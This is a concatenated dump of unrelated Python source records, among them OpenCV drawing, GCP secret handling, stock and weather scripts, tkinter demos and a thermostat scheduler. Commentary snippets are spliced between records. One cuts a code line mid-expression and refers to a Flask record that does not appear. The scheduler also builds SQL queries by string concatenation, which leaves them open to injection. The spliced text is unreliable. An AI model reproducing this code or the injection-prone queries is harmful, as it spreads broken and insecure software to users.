gen_colors():\r\n\tdelta = 256/4\r\n\tcolors = []\r\n\tfor i in range(0,4):\r\n\t\tfor j in range(0,4):\r\n\t\t\tfor k in range(0,4):\r\n\t\t\t\tcolors.append((delta*i, delta*j, delta *k))\r\n\treturn colors\r\n\r\n#Draw skeleton & picture\r\ndef draw_skeleton(inputframe, one_ske, table):\r\n\tdraw_frame = inputframe.copy()\r\n\ti = 0\t\r\n\t# compute the middle of the hip\r\n\t# centerHipY = 
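The Flask record above exposes /api as a JSON endpoint that expects a 'book_desc' key; a client call against a locally running instance would look like this (host, port and the description text are placeholders):

# Calling the /api route of the Flask app above; URL and payload text are
# placeholders for a local development run.
import requests

resp = requests.post('http://127.0.0.1:5000/api',
                     json={'book_desc': 'a space opera about rebellion'})
print(resp.json())  # {'0': {'title': ..., 'author': [...]}, ...}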
(one_ske[4][0]+one_ske[5][0])/2\r\n\t# centerHipX = (one_ske[4][1]+one_ske[5][1])/2\r\n\t# centerHip = (centerHipY, centerHipX)\r\n\t# cv2.line(draw_frame, one_ske[1], centerHip, blue, thickness)\r\n\r\n\tfor xy in table:\r\n\t\tcv2.line(draw_frame, tuple(one_ske[xy[0]]), tuple(one_ske[xy[1]]), colors[i], thickness) \r\n\t\t#draw joints\r\n\t\tcv2.circle(draw_frame, tuple(one_ske[xy[0]]), joint_r, green, 2)\r\n\t\tcv2.circle(draw_frame, tuple(one_ske[xy[1]]), joint_r, green, 2)\r\n\t\ti = i + 1\r\n\tcv2.imshow('mywindow',draw_frame)\t\r\n\treturn draw_frame\r\n\r\n#------------------Skeleton-style---------------\r\nred = (0, 0, 255)\r\ngreen = (0, 255, 0)\r\nblue = (255, 0, 0)\r\nthickness = 10\r\njoint_r = 5\r\ncolors = gen_colors()\r\n\r\nske = readSkeleton(\"1.csv\")\r\ntab = readLookupTable(\"lookup.skeleton\")\r\nimg = cv2.imread(\"3.jpg\")\r\ndraw_skeleton(img,ske,tab)\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()","sub_path":"PoseTool/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"131739387","text":"from google.cloud import secretmanager\n\n# Import the Secret Manager client library.\n\n# GCP project in which to store secrets in Secret Manager.\nPROJECT_ID = \"billing-sync\"\n\n\ndef create_secret(secret_id):\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the parent project.\n parent = f\"projects/{PROJECT_ID}\"\n\n # Build a dict of settings for the secret\n secret = {'replication': {'automatic': {}}}\n\n # Create the secret\n try:\n response = client.create_secret(\n secret_id=secret_id, parent=parent, secret=secret)\n # Print the new secret name.\n print(f'Created secret: {response.name}')\n except Exception as exception: # pylint: disable=broad-except\n print(exception.code, exception.message)\n\n\ndef add_secret_version(secret_id, payload):\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the parent secret.\n parent = f\"projects/{PROJECT_ID}/secrets/{secret_id}\"\n\n # Convert the string payload into a bytes. This step can be omitted if you\n # pass in bytes instead of a str for the payload argument.\n payload = payload.encode('UTF-8')\n\n # Add the secret version.\n response = client.add_secret_version(\n parent=parent, payload={'data': payload})\n\n # Print the new secret version name.\n print(f'Added secret version: {response.name}')\n\n\ndef access_secret_version(the_project_id, secret_id, version_id):\n \"\"\"\n Access the payload for the given secret version if one exists. The version\n can be a version number as a string (e.g. \"5\") or an alias (e.g. \"latest\").\n \"\"\"\n # pylint: disable=unused-argument\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the secret version.\n name = f\"projects/{PROJECT_ID}/secrets/{secret_id}/versions/{version_id}\"\n\n # Access the secret version.\n response = client.access_secret_version(request={\"name\": name})\n\n return response.payload.data.decode(\"UTF-8\")\n\n\ndef access_secret_json(the_project_id, secret_id, version_id):\n \"\"\"\n Access the payload for the given secret version if one exists. The version\n can be a version number as a string (e.g. \"5\") or an alias (e.g. 
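draw_skeleton() above needs the image, skeleton CSV and lookup file on disk; the cv2 primitives it relies on can be exercised on a blank canvas without any of those inputs:

# Self-contained check of the cv2 primitives used by draw_skeleton(), on a
# blank canvas instead of the on-disk image/CSV inputs; writes a file so no
# GUI window is needed.
import numpy as np
import cv2 as cv

canvas = np.zeros((200, 200, 3), dtype=np.uint8)
cv.line(canvas, (20, 20), (180, 180), (255, 0, 0), 10)   # one 'bone'
cv.circle(canvas, (20, 20), 5, (0, 255, 0), 2)           # joint markers
cv.circle(canvas, (180, 180), 5, (0, 255, 0), 2)
cv.imwrite('skeleton_demo.png', canvas)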
\"latest\").\n \"\"\"\n # pylint: disable=unused-argument\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the secret version.\n name = f\"projects/{PROJECT_ID}/secrets/{secret_id}/versions/{version_id}\"\n\n # Access the secret version.\n response = client.access_secret_version(request={\"name\": name})\n\n return response.payload.data.decode(\"UTF-8\")\n\n\ndef delete_secret(the_project_id, secret_id):\n \"\"\"\n Delete the secret with the given name and all of its versions.\n \"\"\"\n # pylint: disable=unused-argument\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the secret.\n name = client.secret_path(PROJECT_ID, secret_id)\n\n # Delete the secret.\n client.delete_secret(request={\"name\": name})\n\n\ndef list_secrets(the_project_id):\n \"\"\"\n List all secrets in the given project.\n \"\"\"\n # pylint: disable=unused-argument\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the parent project.\n parent = f\"projects/{PROJECT_ID}\"\n\n # List all secrets.\n for secret in client.list_secrets(request={\"parent\": parent}):\n print(f\"Found secret: {secret.name}\")\n\n\nprint(\"Secret Manager: started\")\n","sub_path":"secret_manager.py","file_name":"secret_manager.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"384193814","text":"import requests\nfrom configparser import ConfigParser\n\n# read the api key from the config file\ndef read_api_key(filename):\n parser = ConfigParser()\n\n parser = ConfigParser()\n parser.read(filename)\n\n return parser.get('keys', 'api-key')\n\ndef get_stock_data(symbol, start_date, end_date):\n base_url = \"https://api.tiingo.com/tiingo/daily/\" + symbol + \"/prices\"\n api_key = read_api_key(\"api-key.ini\")\n print(api_key)\n payload = {\n 'token': api_key,\n 'startDate': start_date,\n 'endDate': end_date\n }\n response = requests.get(base_url, params=payload)\n return response\n\nif __name__ == \"__main__\":\n print(\"data_retriever.py\")\n res = get_stock_data(\"PFE\", '2018-03-25', '2019-04-25')\n print(res.json())\n","sub_path":"data_retriever.py","file_name":"data_retriever.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"459191149","text":"import cv2 as cv\r\nimport numpy as np \r\n\r\nimg = cv.imread('gradient.png',0) #_, is a variable name\r\n_, th1 = cv.threshold(img,127,255,cv.THRESH_BINARY)#binary threshhold \r\n_, th2 = cv.threshold(img,127,255,cv.THRESH_BINARY_INV)#inverses the value \r\n\r\ncv.imshow('image',img)\r\ncv.imshow('TH1',th1)\r\ncv.imshow('TH2',th2)\r\ncv.waitKey(0)\r\ncv.destroyAllWindows()\r\n\r\n","sub_path":"simplethreshold.py","file_name":"simplethreshold.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"79510722","text":"#from lxml import etree\nimport requests\n#import demjson\n\nx = 0\ny = 0\n\nmovie = []\n\nHEADERS = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',\n 'Accept-Language':'zh-CN,zh;q=0.9'\n}\n\nfirst = 'https://www.toutiao.com/stream/widget/local_weather/city/'\n\ndef get_detail_urls(url):\n 
\"\"\" 获取一页电影 \"\"\"\n global y\n response = requests.get(url,headers=HEADERS)\n text = response.text\n print (text)\n #html = etree.HTML(text)\n #detail_urls = html.xpath(\"//table[@class='tbspan']//a/@href\")\n #detail_urls = map(lambda url:frist+url,detail_urls)\n #y += 1\n #print('='*30)\n #print('第{}页开始爬取!'.format(y))\n #print('=' * 30)\n #return detail_urls \n\nif __name__ == '__main__':\n get_detail_urls(first)\n","sub_path":"spider-movie.py","file_name":"spider-movie.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"180442032","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 24 12:47:19 2015\n\n@author: berliner\n\"\"\"\n\nimport xml.etree.ElementTree as ET\nimport numpy as np\nfrom pandas import DataFrame\n\nclass indexGenerator():\n \"\"\" Generates an increasing index for each localisation based on the frame\n number. Assumes the frames to be ordered. For use with pandas multiindex\n DataFrames \"\"\"\n def __init__(self):\n self.currentFrame = 0\n self.previousFrame = 0\n self.idx = -1\n\n def __call__(self, frame):\n if frame == self.currentFrame:\n self.idx += 1\n return self.idx\n else:\n # update the frames\n self.previousFrame = self.currentFrame\n self.currentFrame = frame\n self.idx = 0\n return self.idx\n\ndef generateIndex(allData, imageNumber):\n idx = indexGenerator()\n # assemble the index structure for the DataFrame\n level1 = [ 'frame_' + str(int(frame)) for frame in allData[:,imageNumber] ]\n level2 = [ idx(frame) for frame in allData[:,imageNumber] ]\n index = [ level1, level2 ]\n return index\n\ndef readThunderstormLocalisations(fname, pixelSize=1.0):\n \"\"\" Read Thunderstorm localisation files \"\"\"\n # Read the header\n with open(fname, 'r') as f:\n header = [ item.strip('\"') for item in f.readline().strip().split(',') ]\n # Check the required columns\n assert( 'x [nm]' in header )\n assert( 'y [nm]' in header )\n assert( 'frame' in header )\n assert( 'intensity [photon]' in header )\n assert( 'offset [photon]' in header )\n assert( 'bkgstd [photon]' in header )\n assert( 'uncertainty [nm]' in header )\n \n xPositionIndex = header.index('x [nm]')\n yPositionIndex = header.index('y [nm]')\n uncertaintyIndex = header.index('uncertainty [nm]')\n intensityIndex = header.index('intensity [photon]')\n frameIndex = header.index('frame')\n offsetIndex = header.index('offset [photon]')\n bkgstdIndex = header.index('bkgstd [photon]')\n sigmaIndex = header.index('sigma [nm]')\n \n # Read the data\n allData = np.loadtxt(fname, skiprows=1, delimiter=',')\n \n # Sort ascending frames, thanks to: http://stackoverflow.com/a/2828121\n allData = allData[allData[:,frameIndex].argsort()]\n \n # Assemble the index structure for the DataFrame\n index = generateIndex(allData, frameIndex)\n \n # Select the columns\n dataIndexes = [xPositionIndex, yPositionIndex, uncertaintyIndex, intensityIndex, \\\n frameIndex, sigmaIndex, offsetIndex, bkgstdIndex ]\n\n columns = ['x','y','uncertainty', 'intensity [photon]', 'frame', \\\n 'sigma', 'offset [photon]', 'bkgstd [photon]']\n \n # Assemble the data into a DataFrame\n data = DataFrame(allData[:,dataIndexes], columns=columns, index=index)\n \n # Convert from nm to px \n data[['x','y','uncertainty','sigma']] = data[['x','y','uncertainty','sigma']] / float(pixelSize)\n \n \n return data\n \n \n\ndef readRapidStormLocalisations(fname, photonConversion=1.0, pixelSize=1.0):\n \"\"\" Read rapidStorm localisations from text file.\n \n 
photonConversion should be set to convert the photon counts correctly\n \n with,\n x = x position\n sx = error of x position\n y = y position\n sy = error of y position\n amp = amplitude\n \n \"\"\"\n assert( isinstance(pixelSize, float) or isinstance(pixelSize, int) ) # int for backwards compatibility\n \n photonConversion = float(photonConversion)\n \n# idx = indexGenerator()\n pixelSize = float(pixelSize)\n \n xPosition = None\n xPositionUncertainty = None\n yPosition = None\n yPositionUncertainty = None\n amplitude = None\n imageNumber = None\n PSFpositionX = None\n PSFpositionY = None\n fitResidues = None\n \n with open(fname, 'r') as f:\n # check the file structure\n header = f.readline()\n # \n root = ET.fromstring(header[2:])\n for index, child in enumerate(root):\n if child.attrib['identifier'] == 'Position-0-0':\n xPosition = index\n elif child.attrib['identifier'] == 'Position-0-0-uncertainty':\n xPositionUncertainty = index\n elif child.attrib['identifier'] == 'Position-1-0':\n yPosition = index\n elif child.attrib['identifier'] == 'Position-1-0-uncertainty':\n yPositionUncertainty = index\n elif child.attrib['identifier'] == 'Amplitude-0-0':\n amplitude = index\n elif child.attrib['identifier'] == 'ImageNumber-0-0':\n imageNumber = index\n elif child.attrib['identifier'] == 'PSFWidth-0-0':\n PSFpositionX = index\n elif child.attrib['identifier'] == 'PSFWidth-1-0':\n PSFpositionY = index\n elif child.attrib['identifier'] == 'FitResidues-0-0':\n fitResidues = index\n elif child.attrib['identifier'] == 'LocalBackground-0-0':\n localBackground = index\n \n # make sure all necessary fields have been identified\n assert( xPosition != None )\n assert( yPosition != None )\n assert( amplitude != None )\n assert( imageNumber != None )\n \n ## read the full file and add a NaN column\n allData = np.loadtxt(fname, skiprows=1)\n rowCount = np.shape(allData)[0]\n \n # calculate the SNR\n SNR = np.zeros((rowCount,1))\n SNR[:,0] = allData[:,amplitude] / allData[:,localBackground]\n allData = np.concatenate((allData,SNR),axis=1)\n SNRindex = np.shape(allData)[1] - 1\n \n # add groupID\n# groupID = np.reshape( np.arange(rowCount), (-1,1) )\n zeros = np.zeros((rowCount,1))\n zeros.fill(np.NaN)\n allData = np.concatenate((allData,zeros),axis=1)\n \n# groupIDindex = -2\n \n # convert the amplitude to photon count\n allData[:,amplitude] /= photonConversion\n \n # convert the pixelSize\n allData[:,[xPosition,yPosition]] /= pixelSize\n\n \n # check which data is there and what needs to be added\n if xPositionUncertainty is None:\n xPositionUncertainty = -1 # select the last column of all zeros\n yPositionUncertainty = -1\n if PSFpositionX is None:\n PSFpositionX = -1\n PSFpositionY = -1\n if fitResidues is None:\n fitResidues = -1\n \n dataIndexes = [xPosition, yPosition, xPositionUncertainty, yPositionUncertainty, \\\n amplitude, imageNumber, fitResidues, SNRindex]\n \n # assemble the index structure for the DataFrame\n index = generateIndex(allData, imageNumber)\n# level1 = [ 'frame_' + str(int(frame)) for frame in allData[:,imageNumber] ]\n# level2 = [ idx(frame) for frame in allData[:,imageNumber] ]\n# index = [ level1, level2 ]\n \n columns = ['x','y','Uncertainty x','Uncertainty y','Photon Count', 'frame', \\\n 'FitResidue', 'SNR']\n \n data = DataFrame(allData[:,dataIndexes], columns=columns, index=index)\n\n return data\n\n\n\n\ndef readXYTLocalisations(fname, pixelSize=1.0):\n \"\"\"\n Read a generic xyt file. 
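The rapidSTORM header parsed above is an XML fragment on the file's first comment line, and the long if/elif chain boils down to mapping each child's identifier attribute to its column position. A compact form of that lookup, on an illustrative header string:

# Compact form of the rapidSTORM header scan: identifier -> column index.
# The sample header below is illustrative, not taken from a real file.
import xml.etree.ElementTree as ET

header = ('<localizations>'
          '<field identifier="Position-0-0"/>'
          '<field identifier="Position-1-0"/>'
          '<field identifier="ImageNumber-0-0"/>'
          '</localizations>')
root = ET.fromstring(header)
columns = {child.attrib['identifier']: i for i, child in enumerate(root)}
print(columns['ImageNumber-0-0'])  # 2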
The first line is used as header information.\n The following columns must be present (case sensitive!),\n \n x y frame\n \n the remaining columns are read and can be used for filtering.\n \"\"\"\n # Read the header\n with open(fname, 'r') as f:\n header = f.readline().strip().split('\\t')\n # Check the required columns\n assert( 'x' in header )\n assert( 'y' in header )\n assert( 'frame' in header )\n \n # Read the data\n allData = np.loadtxt(fname, skiprows=1)\n \n # Sort ascending frames, thanks to: http://stackoverflow.com/a/2828121\n frameIndex = header.index('frame')\n allData = allData[allData[:,frameIndex].argsort()]\n \n # Assemble the index structure for the DataFrame\n index = generateIndex(allData, frameIndex)\n# idx = indexGenerator()\n# level1 = [ 'frame_' + str(int(frame)) for frame in allData[:,frameIndex] ]\n# level2 = [ idx(frame) for frame in allData[:,frameIndex] ]\n# index = [ level1, level2 ]\n \n # Put the data together\n data = DataFrame(allData, index=index, columns=header)\n \n # Convert from nm to px \n data[['x','y']] = data[['x','y']] / float(pixelSize)\n \n return data\n\n\n\ndef readLEBLocalisations(fname, skiprows, columns):\n # Read the data\n allData = np.loadtxt(fname, skiprows=skiprows)\n\n # Sort ascending frames, thanks to: http://stackoverflow.com/a/2828121\n frameIndex = columns.index('frame')\n allData = allData[allData[:,frameIndex].argsort()]\n \n # Assemble the index structure for the DataFrame\n index = generateIndex(allData, frameIndex)\n \n # Put the data together\n data = DataFrame(allData, index=index, columns=columns)\n \n return data\n\n\n\n\n\n\n","sub_path":"lib/readLocalisations.py","file_name":"readLocalisations.py","file_ext":"py","file_size_in_byte":9119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"149074161","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 21 10:45:42 2021\r\n\r\n@author: a.mika2\r\n\"\"\"\r\n\r\nimport tkinter as tk\r\nwindow=tk.Tk()\r\n\r\nwindow.geometry(\"510x600\")\r\nwindow.resizable(False,False)\r\n\r\nglobal label\r\nlabel = tk.Label(window, text=\"Please ensure that you use the correct data type\", fg='red')\r\n\r\ndef submit():\r\n try:\r\n print(f'Entry: {str_entry_var.get()}')\r\n print(f'Password Entry: {int_entry_var.get()}')\r\n print(f'Radio Buttons: {double_entry_var.get()}')\r\n print(f'Check Button 1: {double_entry_var.get()}')\r\n print(f'Check Button 2: {boolean_entry_var.get()}')\r\n except:\r\n label.pack()\r\n else:\r\n label.pack_forget()\r\n\r\nstr_entry_var=tk.StringVar()\r\nstr_entry=tk.Entry(window,textvariable=str_entry_var)\r\nstr_entry.pack()\r\n\r\nint_entry_var=tk.IntVar()\r\nint_entry=tk.Entry(window,textvariable=int_entry_var)\r\nint_entry.pack()\r\n\r\ndouble_entry_var=tk.DoubleVar()\r\ndouble_entry=tk.Entry(window,textvariable=double_entry_var)\r\ndouble_entry.pack()\r\n\r\nboolean_entry_var=tk.BooleanVar()\r\nboolean_entry=tk.Entry(window,textvariable=boolean_entry_var)\r\nboolean_entry.pack()\r\n\r\nbutton=tk.Button(window, text='Submit', command=submit)\r\nbutton.pack()\r\n\r\nwindow.mainloop()","sub_path":"Widgets&Variables/variables_example.py","file_name":"variables_example.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"522697246","text":"import win32com.client\nimport cx_Oracle as ora\nimport os.path\n#from datetime import timezone\nimport datetime\nimport pytz\nfrom statsmodels.miscmodels import 
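utc_to_local() in the weather script above tags a naive datetime as UTC and converts it to Europe/Moscow; a quick check of what that produces:

# What utc_to_local() computes: tag a naive timestamp as UTC, then convert.
import datetime
import pytz

local_tz = pytz.timezone('Europe/Moscow')
naive_utc = datetime.datetime(2021, 1, 1, 12, 0)
local = naive_utc.replace(tzinfo=pytz.utc).astimezone(local_tz)
print(local.isoformat())  # 2021-01-01T15:00:00+03:00 (Moscow is UTC+3)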
count\nimport csv\nimport pandas\nimport numpy as np\n\nimport credentials as cr\n\nlocal_tz = pytz.timezone('Europe/Moscow')\n\ndef utc_to_local(utc_dt):\n local_dt = utc_dt.replace(tzinfo=pytz.utc).astimezone(local_tz)\n return local_tz.normalize(local_dt) # .normalize might be unnecessary\n\ndef main():\n #Oracle connection\n dsnStr = ora.makedsn(cr.db_address, cr.db_port, 'DWH')\n con = ora.connect(user=cr.db_user, password=cr.db_pass, dsn=dsnStr)\n\n\n #Take last date from SQL Table\n cur = con.cursor()\n cur.execute('''select max(date_temp) dt\n from vklim.weather t''')\n for row in cur:\n max_data = row[0]\n max_data = utc_to_local(max_data)\n print(\"last date in vklim.weather {}\".format(max_data))\n\n actual_data = []\n next_date = max_data + datetime.timedelta(days=1) #getting next date\n next_date_str = next_date.strftime(\"%d.%m.%Y\") #next date to string format\n\n path_weather = cr.weather_public_path + next_date_str + \".csv\"\n\n while next_date <= utc_to_local(datetime.datetime.today() - datetime.timedelta(days=1)):\n if os.path.isfile(path_weather):\n print(next_date_str)\n df = pandas.read_csv(path_weather, sep=';|\"', engine='python') # getting data to DataFrame\n # drop duplicates and converting to right types\n df = df.drop_duplicates()\n df['local_datetime'] = pandas.to_datetime(df['local_datetime'])\n if df['temperature'].dtype == np.object:\n df['temperature'] = pandas.to_numeric(df['temperature'].str.replace(',', '.'))\n\n cities = df.city.unique() #unique cities in csv\n for city in cities:\n city_df = df[df['city'] == city]\n h15_found = False\n for index, row in city_df.iterrows():\n if row['local_datetime'].hour == 15:\n #print(row)\n actual_data.append((row['temperature'], row['city'], row['local_date']))\n h15_found = True\n if not h15_found:\n actual_data.append((city_df[\"temperature\"].mean(), city_df.iloc[0]['city'],\n city_df.iloc[0]['local_date']))\n else:\n print(\"{} csv not found\".format(next_date_str))\n # next date\n next_date += datetime.timedelta(days=1)\n next_date_str = next_date.strftime(\"%d.%m.%Y\")\n path_weather = cr.weather_public_path + next_date_str + \".csv\"\n\n # Insert in SQL Table\n cur2 = con.cursor()\n cur2.bindarraysize = len(actual_data[0])\n cur2.executemany(\"insert into vklim.weather(temp, city, date_temp) values (:1, :2, :3)\", actual_data)\n con.commit()\n\n # print(actual_data)\n cur.close()\n cur2.close()\n con.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/weather_dwh_update.py","file_name":"weather_dwh_update.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"649509850","text":"#/usr/bin/python\nimport sys\nfrom log import Log\nfrom django.db import connection\n\ndef get_scheduled_target_temperature(day_of_week, hour, minute):\n with connection.cursor() as c:\n query = '''SELECT hour, minute, temperature, id FROM Schedule WHERE day_of_week = ''' + str(day_of_week) + ''' AND ((hour < ''' + str(hour) + ''') OR (hour = ''' + str(hour) + ''' AND minute <= ''' + str(minute) + ''')) ORDER BY hour DESC, minute DESC'''\n c.execute(query)\n \n value = c.fetchone()\n if value is not None :\n return int(value[2]), int(value[3])\n else :\n if day_of_week > 0:\n return get_scheduled_target_temperature(day_of_week - 1, 23, 59)\n else :\n return get_scheduled_target_temperature(6, 23, 59)\n\ndef get_schedule():\n with connection.cursor() as c:\n c.execute('''SELECT * FROM Schedule''') \n value = c.fetchall()\n 
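get_scheduled_target_temperature() above builds its SQL by string concatenation; with Django's cursor the same lookup can be parameterized, which avoids injection and quoting pitfalls. A sketch of the equivalent query (placeholder style assumed to be the backend's %s; the original's previous-day fallback is omitted for brevity):

# Parameterized form of the schedule lookup: same table and ORDER BY, with
# values bound via placeholders. The recursion to the previous day that the
# original performs when no row matches is left out here.
from django.db import connection

def get_scheduled_target_temperature(day_of_week, hour, minute):
    with connection.cursor() as c:
        c.execute(
            'SELECT hour, minute, temperature, id FROM Schedule '
            'WHERE day_of_week = %s '
            'AND (hour < %s OR (hour = %s AND minute <= %s)) '
            'ORDER BY hour DESC, minute DESC',
            [day_of_week, hour, hour, minute],
        )
        row = c.fetchone()
    return (int(row[2]), int(row[3])) if row else None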
return value\n\ndef set_schedule_by_json(json_data):\n with connection.cursor() as c:\n for sched in json_data:\n query = '''UPDATE Schedule SET hour = ''' + str(sched['hour']) + ''', minute = ''' + str(sched['minute']) + ''', temperature = ''' + str(sched['temperature']) + ''' WHERE id = ''' + str(sched['id'])\n c.execute(query)\n","sub_path":"rpi-thermostat-django/app/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48227726","text":"#https://likegeeks.com/python-gui-examples-tkinter-tutorial/\n\nfrom tkinter import *\n\nwindow = Tk()\nwindow.geometry('350x200')\nwindow.title(\"Welcome to Victors App\")\n\n#Normal Text\nlbl = Label(window, text=\"Hello\")\nlbl.grid(column=0, row=0)\n\n#Input box\ntxt = Entry(window,width=10)\ntxt.grid(column=1, row=0)\n\n#Buttton\ndef clicked():\n res = \"I want \" + txt.get()\n lbl.configure(text= res)\n\nbtn = Button(window, text=\"Click Me\", command=clicked)\nbtn.grid(column=2, row=0)\n\n#Check-Box\nchk_state = BooleanVar()\nchk_state.set(0) #set check state\nchk = Checkbutton(window, text='Choose', var=chk_state)\nchk.grid(column=0, row=1)\n\n#Combo-Box\ncombo = Combobox(window)\ncombo['values']= (1, 2, 3, 4, 5, \"Text\")\ncombo.current(1) #set the selected item\ncombo.grid(column=0, row=2)\n\nwindow.mainloop()\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32511872","text":"# 正则表达式\n# JSON(xml)\n'''\n正则表达式是一个特殊的字符序列,检测一个字符串是否与\n我们所设定的这样的字符序列相匹配\n\n快速检索文本,实现一些替换文本的操作\n1.检查一串数字是否是电话号码\n2.检查一个字符串是否符合email\n3.把一个文本里指定的单词替换为另外一个单词\n\n'''\nimport re\n\na = 'C|C++|Java|C#|Python|Javascript'\nr =re.findall('Python', a)\n# 规则\nif len(r)>0:\n print(\"YES\")\nelse:\n print(\"NO\")\n","sub_path":"python/regex/re1.py","file_name":"re1.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333470734","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n\nTIPOS_ROUPAS = (\n (1, \"Camisa\"),\n (2, \"Camiseta/Blusa\"),\n (3, \"Edredon\"),\n (4, \"Lencol\"),\n (5, \"Roupa de Luxo\"),\n (6, \"Roupa Intima\"),\n (7, \"Roupa Jeans\"),\n (8, \"Toalha de Banho\"),\n (9, \"Toalha de Mesa\"),\n (10, \"Toalha de Rosto\")\n)\n\nDEFAULT_TIPO_ROUPAS = 2\n","sub_path":"virtual/lavanderia/pedido/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"532142152","text":"np.random.seed(1234)\n\nmean = [4,3.5]\ncov = [[0.25,0],[0,0.25]]\nsize = 1000\npuntos_dist1 = np.random.multivariate_normal(mean, cov, size)\n\nmean = [-1,-1]\ncov = [[0.25,0],[0,0.25]]\nsize = 1000\npuntos_dist2 = np.random.multivariate_normal(mean, cov, size)\n\nmean = [-1,1]\ncov = [[0.25,0],[0,0.25]]\nsize = 1000\npuntos_dist3 = np.random.multivariate_normal(mean, cov, size)\n\nmean = [1,-1]\ncov = [[0.25,0],[0,0.25]]\nsize = 1000\npuntos_dist4 = np.random.multivariate_normal(mean, cov, size)\n\npuntos1 = np.append(puntos_dist1,puntos_dist2,axis=0)\npuntos2 = np.append(puntos_dist3,puntos_dist4,axis=0)\n\npuntos = np.append(puntos1, puntos2, axis = 0)\n\nxprima2 = kmeans(puntos, 
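One catch in the tkinter record above: Combobox lives in tkinter.ttk, so with only "from tkinter import *" the Combobox(window) line raises NameError. The working imports and the same combo setup:

# Combobox comes from the themed-widget submodule, not from tkinter itself.
from tkinter import Tk
from tkinter.ttk import Combobox

window = Tk()
combo = Combobox(window, values=(1, 2, 3, 4, 5, 'Text'))
combo.current(1)            # preselect the second entry
combo.grid(column=0, row=2)
window.mainloop()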
4)\n","sub_path":"ssolano586/build/lib/ssolano586/script_prueba.py","file_name":"script_prueba.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"569747657","text":"import unittest\n\nfrom botworx.run.behavior import *\n\nclass Test(unittest.TestCase):\n def test(self):\n with action() as a:\n\n async def fn():\n print(\"Hi\")\n\n a.use(fn)\n a.run()\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_action.py","file_name":"test_action.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"135763177","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.contrib.auth import authenticate\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_401_UNAUTHORIZED\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt,csrf_protect\n\nfrom django.shortcuts import get_object_or_404\nfrom django.views.generic import View,ListView,DetailView,CreateView,UpdateView,DeleteView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import redirect\nfrom django.utils import timezone\nimport sys\nimport json\nfrom django.http import HttpResponseForbidden\nfrom django.http import Http404\n\nfrom .models import User\nfrom company.models import Company\nfrom department.models import Section\n\n\n\n@api_view(['POST'])\n@csrf_exempt\ndef upload(request):\n\tresponse_msg = ''\n\tif request.method=='POST':\n\t\ttry :\n\t\t\timport datetime\n\t\t\tdata = json.loads(request.body.decode(\"utf-8\"))\n\t\t\t# Show all data\n\t\t\tfor key in data:\n\t\t\t\tprint (key,data[key])\n\t\t\ten \t\t\t\t= data['en']\n\t\t\tfirst_name \t\t= data['first_name']\n\t\t\tlast_name \t\t= data['last_name']\n\t\t\tsection\t\t\t= data['section']\n\t\t\tcompany \t\t= data['company']\n\t\t\tusername \t\t= data['username']\n\t\t\t# get company\n\t\t\tobjCompany \t\t= Company.objects.get(name=company)\n\t\t\t# get section\n\t\t\tobjSection \t\t= Section.objects.get(name=section)\n\n\t\t\tm = 